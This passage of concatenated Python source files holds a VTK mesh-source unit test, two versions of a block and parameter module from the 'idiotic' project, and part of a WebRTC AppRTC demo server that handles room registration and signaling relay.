            [4, 5, 6, 7, 8, 9, 10, 11]]  # hex
        self.faces = [[2, 7, 11]]
        self.edges = [[1, 4], [3, 8]]
        self.container = container = Mesh('test')
        self.point_uids = [
            container.add_point(Point(coordinates=point)) for point in points]

    def test_points(self):
        """Every container point appears at its mapped index in the source."""
        container = self.container

        source = MeshSource.from_mesh(container)

        points = source.data.points.to_array()
        number_of_points = len(self.points)
        self.assertEqual(len(points), number_of_points)
        self.assertEqual(len(source.point2index), number_of_points)
        for key, index in source.point2index.items():
            point = container.get_point(key)
            assert_array_equal(points[index], point.coordinates)

    def test_cells(self):
        """Cells map to the right VTK cell type and point indices."""
        container = self.container
        for cell in self.cells:
            container.add_cell(
                Cell(points=[self.point_uids[index] for index in cell]))

        source = MeshSource.from_mesh(container)

        vtk_source = source.data
        cells = [
            cell
            for cell in cell_array_slicer(vtk_source.get_cells().to_array())]
        number_of_cells = len(self.cells)
        self.assertEqual(len(cells), number_of_cells)
        self.assertEqual(len(source.element2index), number_of_cells)
        for key, index in source.element2index.items():
            cell = container.get_cell(key)
            self.assertEqual(
                vtk_source.get_cell_type(index),
                CELL2VTKCELL[len(cell.points)])
            points = [source.point2index[uid] for uid in cell.points]
            self.assertEqual(cells[index], points)

    def test_edges(self):
        """Edges map to the right VTK cell type and point indices."""
        container = self.container
        for edge in self.edges:
            container.add_edge(
                Edge(points=[self.point_uids[index] for index in edge]))

        source = MeshSource.from_mesh(container)

        vtk_source = source.data
        edges = [
            edge
            for edge in cell_array_slicer(vtk_source.get_cells().to_array())]
        number_of_edges = len(self.edges)
        self.assertEqual(len(edges), number_of_edges)
        self.assertEqual(len(source.element2index), number_of_edges)
        for key, index in source.element2index.items():
            edge = container.get_edge(key)
            self.assertEqual(
                vtk_source.get_cell_type(index),
                EDGE2VTKCELL[len(edge.points)])
            points = [source.point2index[uid] for uid in edge.points]
            self.assertEqual(edges[index], points)

    def test_face(self):
        """Faces map to the right VTK cell type and point indices."""
        container = self.container
        for face in self.faces:
            container.add_face(
                Face(points=[self.point_uids[index] for index in face]))

        source = MeshSource.from_mesh(container)

        vtk_source = source.data
        faces = [
            face
            for face in cell_array_slicer(vtk_source.get_cells().to_array())]
        number_of_faces = len(self.faces)
        self.assertEqual(len(faces), number_of_faces)
        self.assertEqual(len(source.element2index), number_of_faces)
        for key, index in source.element2index.items():
            face = container.get_face(key)
            self.assertEqual(
                vtk_source.get_cell_type(index),
                FACE2VTKCELL[len(face.points)])
            points = [source.point2index[uid] for uid in face.points]
            self.assertEqual(faces[index], points)

    def test_all_element_types(self):
        """Mixed containers classify each element by its VTK cell type."""
        container = self.container
        for face in self.faces:
            container.add_face(
                Face(points=[self.point_uids[index] for index in face]))
        for edge in self.edges:
            container.add_edge(
                Edge(points=[self.point_uids[index] for index in edge]))
        for cell in self.cells:
            container.add_cell(
                Cell(points=[self.point_uids[index] for index in cell]))

        source = MeshSource.from_mesh(container)

        vtk_source = source.data
        elements = [
            element
            for element in cell_array_slicer(
                vtk_source.get_cells().to_array())]
        number_of_elements = \
            len(self.faces) + len(self.edges) + len(self.cells)
        self.assertEqual(len(elements), number_of_elements)
        self.assertEqual(len(source.element2index), number_of_elements)
        for key, index in source.element2index.items():
            cell_type = vtk_source.get_cell_type(index)
            if cell_type in EDGE2VTKCELL.values():
                element = container.get_edge(key)
                self.assertEqual(
                    cell_type, EDGE2VTKCELL[len(element.points)])
            elif cell_type in FACE2VTKCELL.values():
                element = container.get_face(key)
                self.assertEqual(
                    cell_type, FACE2VTKCELL[len(element.points)])
            elif cell_type in CELL2VTKCELL.values():
                element = container.get_cell(key)
                self.assertEqual(
                    cell_type, CELL2VTKCELL[len(element.points)])
            else:
                self.fail('vtk source has an unknown cell type')
            points = [source.point2index[uid] for uid in element.points]
            self.assertEqual(elements[index], points)
|
import logging
from typing import Set
from idiotic import resource
from idiotic import config as global_config
import idiotic
import asyncio
# Import used only for the 'Cluster' string annotation below; the `if False`
# guard keeps it out of runtime imports (presumably to avoid a circular
# import — typing.TYPE_CHECKING would express the same intent).
if False:
    from idiotic.cluster import Cluster
class Block:
    """Base unit of processing: receives inputs, emits outputs, and runs
    only while the local node owns it and its required resources are
    available.

    Fixes: the bare ``except:`` in run_while_ok is narrowed to
    ``except Exception:`` so SystemExit and other BaseExceptions are not
    swallowed, and ``input_to`` gets a per-instance list in __init__ (the
    class-level list was shared by every instance that mutated it).
    """

    #: Registry of block classes by type name; used by create().
    REGISTRY = {}

    # Class-level defaults only; __init__ gives each instance its own
    # copies of the mutable ones.
    running = False
    name = None
    inputs = {}
    input_to = []
    resources = []
    config = {}

    def __init__(self, name, inputs=None, resources=None, input_to=None, **config):
        #: A globally unique identifier for the block
        self.name = name
        #: Mapping of this block's inputs
        self.inputs = inputs or {}
        #: List of resources that this block needs
        self.resources = resources or []
        #: Destinations this block feeds into (per-instance; previously only
        #: ever assigned externally, leaving the class list shared)
        self.input_to = input_to or []
        #: The config for this block
        self.config = config or {}

    async def run(self, *args, **kwargs):
        """Default main loop: idle. Subclasses override with real work."""
        await asyncio.sleep(3600)

    async def run_while_ok(self, cluster: 'Cluster'):
        """Run this block while the node owns it and its resources check
        out; afterwards hand it back to the cluster for reassignment."""
        if self.running:
            return
        self.running = True
        try:
            if idiotic.node.own_block(self.name):
                await self.init_resources()
            while idiotic.node.own_block(self.name) and self.check_resources():
                await self.run()
        except KeyboardInterrupt:
            raise
        except Exception:
            # Narrowed from a bare `except:`.
            logging.exception("While running block {}".format(self.name))
        self.running = False
        if idiotic.node.own_block(self.name):
            idiotic.node.cluster.unassign_block(self.name)
            idiotic.node.cluster.assign_block(self)

    async def init_resources(self):
        """Poll until every required resource reports it is initialized."""
        while not all((r.initialized for r in self.resources)):
            await asyncio.sleep(.1)

    def require(self, *resources: resource.Resource):
        """Add required resources to this block."""
        self.resources.extend(resources)

    def precheck_nodes(self, config: global_config.Config) -> Set[str]:
        """Return the node names on which every required resource can run."""
        all_nodes = set(config.nodes.keys())
        for req in self.resources:
            nodes = req.available_hosts(config)
            if nodes is not None:
                all_nodes.intersection_update(set(nodes))
        return all_nodes

    async def run_resources(self):
        """Run all required resources concurrently."""
        await asyncio.gather(*[asyncio.ensure_future(r.run()) for r in self.resources])

    def check_resources(self) -> bool:
        """True when every required resource is currently available."""
        return all((r.available for r in self.resources))

    def try_resources(self):
        """Trigger each resource's availability check."""
        for r in self.resources:
            r.try_check()

    async def output(self, data, *args):
        """Dispatch `data` from the named output(s); defaults to the block name."""
        if not args:
            args = [self.name,]
        for source in args:
            idiotic.node.dispatch({"data": data, "source": self.name+"."+source})
def create(name, block_config):
    """Instantiate a registered block type from a config dict.

    Recognized keys ("type", "inputs", "input_to", "require") are consumed
    here; everything else is passed to the block constructor as config.
    Fix: "input_to" is now stripped too — it was previously left in
    `block_config` and leaked into the block's **config.
    """
    block_type = block_config.get("type", "Block")
    inputs = block_config.get("inputs", {})
    input_to = block_config.get("input_to", [])

    # A single destination may be given as a bare string.
    if isinstance(input_to, str):
        input_to = [input_to]

    requires = block_config.get("require", [])

    for attr in ("type", "inputs", "input_to", "require"):
        if attr in block_config:
            del block_config[attr]

    block_cls = Block.REGISTRY[block_type]
    res = block_cls(name=name, **block_config)
    res.inputs = inputs
    res.input_to = input_to

    # "node=<host>" requirements pin the block to a specific host.
    for req in requires:
        if req.startswith("node="):
            res.require(resource.HostResource(req[5:]))
    return res
Add more block stuff
import logging
from typing import Set
from idiotic import resource
from idiotic import config as global_config
import idiotic
import asyncio
# Import used only for the 'Cluster' string annotation below; the `if False`
# guard keeps it out of runtime imports (presumably to avoid a circular
# import — typing.TYPE_CHECKING would express the same intent).
if False:
    from idiotic.cluster import Cluster
class Block:
    """Base unit of processing: receives inputs, emits outputs, and runs
    only while the local node owns it and its required resources are
    available.

    Fixes: the bare ``except:`` in run_while_ok is narrowed to
    ``except Exception:`` so SystemExit and other BaseExceptions are not
    swallowed, and ``input_to`` gets a per-instance list in __init__ (the
    class-level list was shared by every instance that mutated it).
    """

    #: Registry of block classes by type name; used by create().
    REGISTRY = {}

    # Class-level defaults only; __init__ gives each instance its own
    # copies of the mutable ones.
    running = False
    name = None
    inputs = {}
    input_to = []
    resources = []
    config = {}

    def __init__(self, name, inputs=None, resources=None, input_to=None, **config):
        #: A globally unique identifier for the block
        self.name = name
        #: Mapping of this block's inputs
        self.inputs = inputs or {}
        #: List of resources that this block needs
        self.resources = resources or []
        #: Destinations this block feeds into (per-instance; previously only
        #: ever assigned externally, leaving the class list shared)
        self.input_to = input_to or []
        #: The config for this block
        self.config = config or {}

    async def run(self, *args, **kwargs):
        """Default main loop: idle. Subclasses override with real work."""
        await asyncio.sleep(3600)

    async def run_while_ok(self, cluster: 'Cluster'):
        """Run this block while the node owns it and its resources check
        out; afterwards hand it back to the cluster for reassignment."""
        if self.running:
            return
        self.running = True
        try:
            if idiotic.node.own_block(self.name):
                await self.init_resources()
            while idiotic.node.own_block(self.name) and self.check_resources():
                await self.run()
        except KeyboardInterrupt:
            raise
        except Exception:
            # Narrowed from a bare `except:`.
            logging.exception("While running block {}".format(self.name))
        self.running = False
        if idiotic.node.own_block(self.name):
            idiotic.node.cluster.unassign_block(self.name)
            idiotic.node.cluster.assign_block(self)

    async def init_resources(self):
        """Poll until every required resource reports it is initialized."""
        while not all((r.initialized for r in self.resources)):
            await asyncio.sleep(.1)

    def require(self, *resources: resource.Resource):
        """Add required resources to this block."""
        self.resources.extend(resources)

    def precheck_nodes(self, config: global_config.Config) -> Set[str]:
        """Return the node names on which every required resource can run."""
        all_nodes = set(config.nodes.keys())
        for req in self.resources:
            nodes = req.available_hosts(config)
            if nodes is not None:
                all_nodes.intersection_update(set(nodes))
        return all_nodes

    async def run_resources(self):
        """Run all required resources concurrently."""
        await asyncio.gather(*[asyncio.ensure_future(r.run()) for r in self.resources])

    def check_resources(self) -> bool:
        """True when every required resource is currently available."""
        return all((r.available for r in self.resources))

    def try_resources(self):
        """Trigger each resource's availability check."""
        for r in self.resources:
            r.try_check()

    async def output(self, data, *args):
        """Dispatch `data` from the named output(s); defaults to the block name."""
        if not args:
            args = [self.name,]
        for source in args:
            idiotic.node.dispatch({"data": data, "source": self.name+"."+source})
class InlineBlock(Block):
    """A Block wrapping a plain callable: calling the block runs the
    callable and emits its return value as the block's output."""

    def __init__(self, name, function=None, **kwargs):
        super().__init__(name, **kwargs)
        # The wrapped callable; may be None, making calls a no-op.
        self.function = function

    def __call__(self, *args, **kwargs):
        if self.function:
            # NOTE(review): Block.output is an `async def`; calling it here
            # without awaiting or scheduling it produces a coroutine that is
            # never run, so the output is never dispatched — confirm callers
            # await/schedule the result, or this is a bug.
            self.output(self.function(*args, **kwargs))
class ParameterBlock:
    """Mixin giving a block named, settable parameters.

    Parameters are declared with declare_parameters(); afterwards,
    accessing ``self.<param>`` returns an async setter coroutine suitable
    for wiring as a block input, and formatted()/get_parameter() read the
    current values.

    Fix: the parameter dict was a class-level mutable, so every instance
    (of every subclass) shared one set of parameters. Each instance now
    gets its own dict, created lazily on first write.
    """

    # Class-level fallbacks. __param_dict stays empty at class level — it
    # exists only so reads (including __getattr__) have something to
    # consult before any declaration, which also avoids __getattr__
    # recursion; all writes go to a per-instance copy via __own_params().
    __param_dict = {}
    __auto_params = True

    def __own_params(self):
        # Return this instance's private parameter dict, creating it
        # lazily in __dict__ so the class-level default is never mutated.
        params = self.__dict__.get('_ParameterBlock__param_dict')
        if params is None:
            params = {}
            self.__dict__['_ParameterBlock__param_dict'] = params
        return params

    def declare_parameters(self, *keys, **items):
        """Declare parameter names (`keys`, default None) and/or
        name=default pairs (`items`) on this instance."""
        self.__auto_params = False
        params = self.__own_params()
        params.update(items)
        for key in keys:
            if key not in params:
                params[key] = None

    def __getattr__(self, key):
        # Only reached for attributes not found normally. Declared
        # parameters yield an async setter; anything else is an error so
        # typos surface instead of silently creating parameters.
        if key in self.__param_dict:
            async def __input(val):
                await self._setparam(key, val)
            return __input
        else:
            raise ValueError("Parameter name not declared")

    async def parameter_changed(self, key, value):
        """Subclass hook, awaited after every parameter update."""
        pass

    async def _setparam(self, name, value):
        self.__own_params()[name] = value
        await self.parameter_changed(name, value)

    def formatted(self, value: str):
        """Format `value` using the current parameters as keyword args."""
        return value.format(**self.__param_dict)

    def get_parameter(self, key):
        """Return the current value of `key`, or None when unset."""
        return self.__param_dict.get(key)
def create(name, block_config):
    """Instantiate a registered block type from a config dict.

    Recognized keys ("type", "inputs", "input_to", "require") are consumed
    here; everything else is passed to the block constructor as config.
    Fix: "input_to" is now stripped too — it was previously left in
    `block_config` and leaked into the block's **config.
    """
    block_type = block_config.get("type", "Block")
    inputs = block_config.get("inputs", {})
    input_to = block_config.get("input_to", [])

    # A single destination may be given as a bare string.
    if isinstance(input_to, str):
        input_to = [input_to]

    requires = block_config.get("require", [])

    for attr in ("type", "inputs", "input_to", "require"):
        if attr in block_config:
            del block_config[attr]

    block_cls = Block.REGISTRY[block_type]
    res = block_cls(name=name, **block_config)
    res.inputs = inputs
    res.input_to = input_to

    # "node=<host>" requirements pin the block to a specific host.
    for req in requires:
        if req.startswith("node="):
            res.require(resource.HostResource(req[5:]))
    return res
|
#!/usr/bin/python2.4
#
# Copyright 2011 Google Inc. All Rights Reserved.
"""WebRTC Demo
This module demonstrates the WebRTC API by implementing a simple video chat app.
"""
import cgi
import logging
import os
import random
import re
import json
import jinja2
import threading
import urllib
import webapp2
from google.appengine.api import urlfetch
from google.appengine.ext import db
jinja_environment = jinja2.Environment(
loader=jinja2.FileSystemLoader(os.path.dirname(__file__)))
# Lock for syncing DB operation in concurrent requests handling.
# TODO(brave): keeping working on improving performance with thread syncing.
# One possible method for near future is to reduce the message caching.
LOCK = threading.RLock()

# Sentinel client id used for loopback (self-call) sessions.
LOOPBACK_CLIENT_ID = 'LOOPBACK_CLIENT_ID'

# Default service handing out TURN server credentials (see the
# draft-uberti-rtcweb-turn-rest reference further below).
TURN_BASE_URL = 'https://computeengineondemand.appspot.com'

# Default WebSocket signaling server host and port.
WSS_HOST = 'apprtc-ws.webrtc.org'
WSS_PORT = '8089'

# Key for the CEOD TURN credential service — presumably an API key; confirm.
CEOD_KEY = '4080218913'
def generate_random(length):
    """Return a string of `length` random decimal digits."""
    return ''.join(random.choice('0123456789') for _ in range(length))
def is_chrome_for_android(user_agent):
    """True when the user-agent string names both Android and Chrome."""
    return all(token in user_agent for token in ('Android', 'Chrome'))
# HD is on by default for desktop Chrome, but not Android or Firefox (yet)
def get_hd_default(user_agent):
    """Return 'true'/'false': HD defaults on only for non-Android Chrome."""
    desktop_chrome = 'Chrome' in user_agent and 'Android' not in user_agent
    return 'true' if desktop_chrome else 'false'
# iceServers will be filled in by the TURN HTTP request.
def make_pc_config(ice_transports):
    """Build the peer-connection config; iceServers will be filled in
    later by the TURN HTTP request."""
    if ice_transports:
        return {'iceServers': [], 'iceTransports': ice_transports}
    return {'iceServers': []}
def add_media_track_constraint(track_constraints, constraint_string):
    """Parse one "[mandatory:|optional:]key=value" string and add it to
    `track_constraints` (a {'mandatory': {}, 'optional': []} dict)."""
    parts = constraint_string.split(':')
    if len(parts) == 2:
        # If specified, e.g. mandatory:minHeight=720, set mandatory appropriately.
        mandatory = (parts[0] == 'mandatory')
    else:
        # Otherwise, default to mandatory, except for goog constraints, which
        # won't work in other browsers.
        mandatory = not parts[0].startswith('goog')

    key_value = parts[-1].split('=')
    if len(key_value) != 2:
        logging.error('Ignoring malformed constraint: ' + constraint_string)
        return
    key, value = key_value
    if mandatory:
        track_constraints['mandatory'][key] = value
    else:
        track_constraints['optional'].append({key: value})
def make_media_track_constraints(constraints_string):
    """Turn a constraints query value into True/False or a parsed
    {'mandatory': ..., 'optional': ...} constraints dict."""
    if not constraints_string:
        return True
    normalized = constraints_string.lower()
    if normalized == 'true':
        return True
    if normalized == 'false':
        return False

    track_constraints = {'mandatory': {}, 'optional': []}
    for constraint_string in constraints_string.split(','):
        add_media_track_constraint(track_constraints, constraint_string)
    return track_constraints
def make_media_stream_constraints(audio, video, firefox_fake_device):
    """Build getUserMedia constraints from the audio/video query values;
    `firefox_fake_device` adds the fake-device flag Firefox understands."""
    stream_constraints = {
        'audio': make_media_track_constraints(audio),
        'video': make_media_track_constraints(video),
    }
    if firefox_fake_device:
        stream_constraints['fake'] = True
    logging.info('Applying media constraints: ' + str(stream_constraints))
    return stream_constraints
def maybe_add_constraint(constraints, param, constraint):
    """If `param` is 'true'/'false' (case-insensitive), append the
    corresponding optional boolean constraint; otherwise do nothing.
    Returns the (mutated) constraints dict."""
    value = {'true': True, 'false': False}.get(param.lower())
    if value is not None:
        constraints['optional'].append({constraint: value})
    return constraints
def make_pc_constraints(dtls, dscp, ipv6):
    """Build peer-connection constraints from the request flags."""
    # Force on the new BWE in Chrome 35 and later.
    # TODO(juberti): Remove once Chrome 36 is stable.
    constraints = {'optional': [{'googImprovedWifiBwe': True}]}
    for param, flag in ((dtls, 'DtlsSrtpKeyAgreement'),
                        (dscp, 'googDscp'),
                        (ipv6, 'googIPv6')):
        maybe_add_constraint(constraints, param, flag)
    return constraints
def make_offer_constraints():
    """Offer constraints are currently empty."""
    return {'mandatory': {}, 'optional': []}
def append_url_arguments(request, link):
    """Append all of `request`'s query arguments to `link` as an
    HTML-escaped query string and return the result."""
    arguments = request.arguments()
    if len(arguments) == 0:
        return link
    # NOTE(review): cgi.escape was removed in Python 3.8; this module
    # targets Python 2 (see shebang) — use html.escape if ever ported.
    link += ('?' + cgi.escape(arguments[0], True) + '=' +
             cgi.escape(request.get(arguments[0]), True))
    for argument in arguments[1:]:
        link += ('&' + cgi.escape(argument, True) + '=' +
                 cgi.escape(request.get(argument), True))
    return link
def get_wss_parameters(request):
    """Return (wss_url, wss_post_url) for signaling, honoring the wsh/wsp
    host/port overrides and downgrading to plain ws/http when wstls=false."""
    ws_host = request.get('wsh') or WSS_HOST
    ws_port = request.get('wsp') or WSS_PORT
    ws_tls = request.get('wstls')

    if ws_tls == 'false':
        scheme, post_scheme = 'ws', 'http'
    else:
        scheme, post_scheme = 'wss', 'https'

    wss_url = '%s://%s:%s/ws' % (scheme, ws_host, ws_port)
    wss_post_url = '%s://%s:%s' % (post_scheme, ws_host, ws_port)
    return (wss_url, wss_post_url)
# Returns appropriate room parameters based on query parameters in the request.
# TODO(tkchin): move query parameter parsing to JS code.
def get_room_parameters(request, room_id, client_id, is_initiator):
  """Builds the template/JSON parameter dict for a room.

  Args:
    request: the webapp2 request; query parameters control call behavior.
    room_id: string room identifier.
    client_id: registered client id, or None on the initial page load.
    is_initiator: whether this client initiates the call, or None.

  Returns:
    Dict of parameters consumed by the JS client and HTML templates.
  """
  error_messages = []
  user_agent = request.headers['User-Agent']
  # Which ICE candidates to allow. Useful for forcing a call over TURN by
  # setting it=relay.
  ice_transports = request.get('it')
  # Which TURN transport= to allow (i.e., only TURN URLs with transport=<tt>
  # will be used). Useful for forcing TURN/TCP via it=relay&tt=tcp.
  turn_transports = request.get('tt')
  # A HTTP server that will be used to find the right TURN servers to use, as
  # described in http://tools.ietf.org/html/draft-uberti-rtcweb-turn-rest-00.
  turn_base_url = request.get('ts', default_value=TURN_BASE_URL)
  # "audio"/"video" set the media stream constraints (http://goo.gl/V7cZg).
  # "true"/"false" are interpreted as bools; otherwise a comma-separated list
  # of key=value pairs, each optionally prefixed with "mandatory:" or
  # "optional:" (goog* keys default to optional, others to mandatory).
  audio = request.get('audio')
  video = request.get('video')
  # Pass firefox_fake_device=1 to pass fake: true in the media constraints,
  # which will make Firefox use its built-in fake device.
  firefox_fake_device = request.get('firefox_fake_device')
  # "hd" is shorthand for opening the camera at 720p. With no value, use a
  # platform-specific default; when defaulting to HD use optional
  # constraints, in case the camera doesn't actually support HD modes.
  hd = request.get('hd').lower()
  if hd and video:
    message = 'The "hd" parameter has overridden video=' + video
    logging.error(message)
    error_messages.append(message)
  if hd == 'true':
    video = 'mandatory:minWidth=1280,mandatory:minHeight=720'
  elif not hd and not video and get_hd_default(user_agent) == 'true':
    video = 'optional:minWidth=1280,optional:minHeight=720'
  if request.get('minre') or request.get('maxre'):
    message = ('The "minre" and "maxre" parameters are no longer supported. '
               'Use "video" instead.')
    logging.error(message)
    error_messages.append(message)
  # Allow preferred audio and video codecs to be overridden.
  audio_send_codec = request.get('asc', default_value='')
  audio_receive_codec = request.get('arc', default_value='')
  video_send_codec = request.get('vsc', default_value='')
  video_receive_codec = request.get('vrc', default_value='')
  # Stereo, Opus FEC and Opus max sample rate toggles.
  stereo = request.get('stereo', default_value='')
  opusfec = request.get('opusfec', default_value='')
  opusmaxpbr = request.get('opusmaxpbr', default_value='')
  # Audio/video send & receive bitrates, plus the initial video send bitrate.
  asbr = request.get('asbr', default_value='')
  arbr = request.get('arbr', default_value='')
  vsbr = request.get('vsbr', default_value='')
  vrbr = request.get('vrbr', default_value='')
  vsibr = request.get('vsibr', default_value='')
  # Options for controlling various networking features.
  dtls = request.get('dtls')
  dscp = request.get('dscp')
  ipv6 = request.get('ipv6')
  # Stereoscopic rendering: remote video is a side-by-side view of two
  # cameras' captures, each fed to one eye. Avoid pulling down vr.js
  # (>25KB, minified) if not needed.
  ssr = request.get('ssr')
  include_vr_js = ''
  if ssr == 'true':
    include_vr_js = ('<script src="/js/vr.js"></script>\n' +
                     '<script src="/js/stereoscopic.js"></script>')
  debug = request.get('debug')
  if debug == 'loopback':
    # Set dtls to false as DTLS does not work for loopback.
    dtls = 'false'
    include_loopback_js = '<script src="/js/loopback.js"></script>'
  else:
    include_loopback_js = ''
  # TODO(tkchin): We want to provide a TURN request url on the initial get,
  # but we don't provide client_id until a register. For now just generate
  # a random id, but we should make this better.
  username = client_id if client_id is not None else generate_random(9)
  # BUG FIX: the original split the '%' operator from its operand tuple
  # across two unparenthesized lines (a SyntaxError) and left turn_url
  # unbound whenever turn_base_url was empty. Always bind turn_url.
  turn_url = ''
  if len(turn_base_url) > 0:
    turn_url = '%s/turn?username=%s&key=%s' % (
        turn_base_url, username, CEOD_KEY)
  room_link = request.host_url + '/room/' + room_id
  room_link = append_url_arguments(request, room_link)
  pc_config = make_pc_config(ice_transports)
  pc_constraints = make_pc_constraints(dtls, dscp, ipv6)
  offer_constraints = make_offer_constraints()
  media_constraints = make_media_stream_constraints(audio, video,
                                                    firefox_fake_device)
  wss_url, wss_post_url = get_wss_parameters(request)
  params = {
    'error_messages': error_messages,
    'is_loopback': json.dumps(debug == 'loopback'),
    'room_id': room_id,
    'room_link': room_link,
    'pc_config': json.dumps(pc_config),
    'pc_constraints': json.dumps(pc_constraints),
    'offer_constraints': json.dumps(offer_constraints),
    'media_constraints': json.dumps(media_constraints),
    'turn_url': turn_url,
    'turn_transports': turn_transports,
    'stereo': stereo,
    'opusfec': opusfec,
    'opusmaxpbr': opusmaxpbr,
    'arbr': arbr,
    'asbr': asbr,
    'vrbr': vrbr,
    'vsbr': vsbr,
    'vsibr': vsibr,
    'audio_send_codec': audio_send_codec,
    'audio_receive_codec': audio_receive_codec,
    'video_send_codec': video_send_codec,
    'video_receive_codec': video_receive_codec,
    'ssr': ssr,
    'include_loopback_js': include_loopback_js,
    'include_vr_js': include_vr_js,
    'wss_url': wss_url,
    'wss_post_url': wss_post_url
  }
  if client_id is not None:
    params['client_id'] = client_id
  if is_initiator is not None:
    params['is_initiator'] = json.dumps(is_initiator)
  return params
# For now we have (room_id, client_id) pairs are 'unique' but client_ids are
# not. Uniqueness is not enforced however and bad things may happen if RNG
# generates non-unique numbers. We also have a special loopback client id.
# TODO(tkchin): Generate room/client IDs in a unique way while handling
# loopback scenario correctly.
class Client(db.Model):
  # Datastore record for one participant in a room.
  room_id = db.StringProperty()        # room this client belongs to
  client_id = db.StringProperty()      # random id assigned at register time
  messages = db.ListProperty(db.Text)  # messages queued until a peer joins
  is_initiator = db.BooleanProperty()  # whether this client starts the call
# Constructs the db key for the room. We use this key to create entity groups
# for clients in the same room, so that clients in the same room will be
# strongly consistent.
def get_room_key(room_id):
  # Key path is ('Room', room_id); used as the parent for Client entities.
  return db.Key.from_path('Room', room_id)
# Creates a new Client db object and adds it to |client_map|.
def add_client(client_map, room_id, client_id, messages, is_initiator):
  room_key = get_room_key(room_id)
  # parent=room_key places the client in the room's entity group so reads
  # within a room are strongly consistent.
  client = Client(room_id=room_id,
                  client_id=client_id,
                  messages=messages,
                  is_initiator=is_initiator,
                  parent=room_key)
  client.put()
  client_map[client_id] = client
  logging.info('Added client ' + client_id + ' in room ' + room_id)
# Removes a client from |client_map| and the datastore.
def remove_client(client_map, client_id):
  # Raises KeyError if client_id is absent; callers check membership first.
  client = client_map.pop(client_id)
  client.delete()
# Returns clients for room.
def get_room_clients(room_id):
  """Queries all Client entities in |room_id|'s entity group.

  BUG FIX: the GQL string read 'ANCESTOR IS:ancestor' — the missing space
  between the IS keyword and the :ancestor binding is not valid GQL.
  """
  room_key = get_room_key(room_id)
  return Client.gql('WHERE ANCESTOR IS :ancestor AND room_id = :rid',
                    ancestor=room_key, rid=room_id)
# Returns dictionary of client_id to Client.
def get_room_client_map(room_id):
  """Returns a dict mapping client_id -> Client for the given room."""
  client_map = {}
  for client in get_room_clients(room_id):
    # Datastore may hand back unicode; normalize to str so keys match the
    # ids coming in from request handlers.
    client_map[str(client.client_id)] = client
  return client_map
class ByePage(webapp2.RequestHandler):
  """Handles /bye/<room_id>/<client_id>: a client leaving a room."""

  def post(self, room_id, client_id):
    # Removes |client_id| (and any loopback client) from the room, then
    # promotes the remaining client, if any, to initiator.
    with LOCK:
      client_map = get_room_client_map(room_id)
      if len(client_map) == 0:
        logging.warning('Unknown room: ' + room_id)
        return
      if client_id not in client_map:
        logging.warning('Unknown client ' + client_id + ' for room ' + room_id)
        return
      remove_client(client_map, client_id)
      logging.info('Removed client ' + client_id + ' from room ' + room_id)
      if LOOPBACK_CLIENT_ID in client_map:
        remove_client(client_map, LOOPBACK_CLIENT_ID)
        logging.info('Removed loopback client from room ' + room_id)
      if len(client_map) > 0:
        other_client = client_map.values()[0]
        # Set other client to be new initiator.
        other_client.is_initiator = True
        # This should already be empty, but set it anyway.
        other_client.messages = []
        # Commit changes.
        other_client.put()
      logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
class MessagePage(webapp2.RequestHandler):
  """Handles /message/<room_id>/<client_id>: relays or stores signaling."""

  def write_response(self, result):
    # Replies with a JSON body of the form {"result": <result>}.
    content = json.dumps({ 'result' : result })
    self.response.write(content)

  def send_message_to_collider(self, room_id, client_id, message):
    # POSTs |message| to the collider (WebSocket signaling) server.
    logging.info('Forwarding message to collider for room ' + room_id +
                 ' client ' + client_id)
    wss_url, wss_post_url = get_wss_parameters(self.request)
    url = wss_post_url + '/' + room_id + '/' + client_id
    result = urlfetch.fetch(url=url,
                            payload=message,
                            method=urlfetch.POST)
    if result.status_code != 200:
      logging.error(
          'Failed to send message to collider: %d' % (result.status_code))
      # TODO(tkchin): better error handling.
      self.error(500)
      return
    self.write_response('SUCCESS')

  def post(self, room_id, client_id):
    message_json = self.request.body
    with LOCK:
      client_map = get_room_client_map(room_id)
      occupancy = len(client_map)
      # Check that room exists.
      if occupancy == 0:
        logging.warning('Unknown room: ' + room_id)
        self.write_response('UNKNOWN_ROOM')
        return
      # Check that client is registered.
      if not client_id in client_map:
        logging.warning('Unknown client: ' + client_id)
        self.write_response('UNKNOWN_CLIENT')
        return
      # Check if other client is registered.
      if occupancy == 1:
        # No other client registered: queue the message until a peer joins.
        logging.info('Saving message from client ' + client_id +
                     ' for room ' + room_id)
        client = client_map[client_id]
        text = db.Text(message_json, encoding='utf-8')
        client.messages.append(text)
        client.put()
        self.write_response('SUCCESS')
        return
    # Other client registered, forward to collider. Do this outside the lock.
    # Note: this may fail in local dev server due to not having the right
    # certificate file locally for SSL validation.
    # Note: loopback scenario follows this code path.
    # TODO(tkchin): consider async fetch here.
    self.send_message_to_collider(room_id, client_id, message_json)
class RegisterPage(webapp2.RequestHandler):
  """Handles /register/<room_id>: joins (or creates) a room."""

  def write_response(self, result, params, messages):
    # TODO(tkchin): Clean up response format. For simplicity put everything in
    # params for now.
    params['messages'] = messages
    self.response.write(json.dumps({
      'result': result,
      'params': params
    }))

  def write_room_parameters(self, room_id, client_id, messages, is_initiator):
    # Responds with SUCCESS plus the full room parameter set.
    params = get_room_parameters(self.request, room_id, client_id, is_initiator)
    self.write_response('SUCCESS', params, messages)

  def post(self, room_id):
    client_id = generate_random(8)
    is_loopback = self.request.get('debug') == 'loopback'
    is_initiator = False
    messages = []
    params = {}
    with LOCK:
      client_map = get_room_client_map(room_id)
      occupancy = len(client_map)
      if occupancy == 0:
        # New room: create first client as initiator (plus a loopback peer
        # when debugging in loopback mode).
        is_initiator = True
        add_client(client_map, room_id, client_id, messages, is_initiator)
        if is_loopback:
          add_client(
              client_map, room_id, LOOPBACK_CLIENT_ID, messages, False)
        # Write room parameters response.
        self.write_room_parameters(room_id, client_id, messages, is_initiator)
      elif occupancy == 1:
        # Retrieve stored messages from first client.
        other_client = client_map.values()[0]
        messages = other_client.messages
        # Create second client as not initiator.
        is_initiator = False
        add_client(client_map, room_id, client_id, [], is_initiator)
        # Write room parameters response with any messages.
        self.write_room_parameters(room_id, client_id, messages, is_initiator)
        # Delete the messages we've responded with.
        other_client.messages = []
        other_client.put()
      elif occupancy >= 2:
        # Full room.
        logging.info('Room ' + room_id + ' is full.')
        self.write_response('FULL', params, messages)
        return
    logging.info('User ' + client_id + ' registered in room ' + room_id)
    logging.info('Room ' + room_id + ' has state ' + str(client_map.keys()))
class MainPage(webapp2.RequestHandler):
  """Handles '/': sends the visitor to a freshly generated room."""

  def get(self):
    """Redirects to a room page."""
    room_id = generate_random(8)
    redirect = '/r/' + room_id
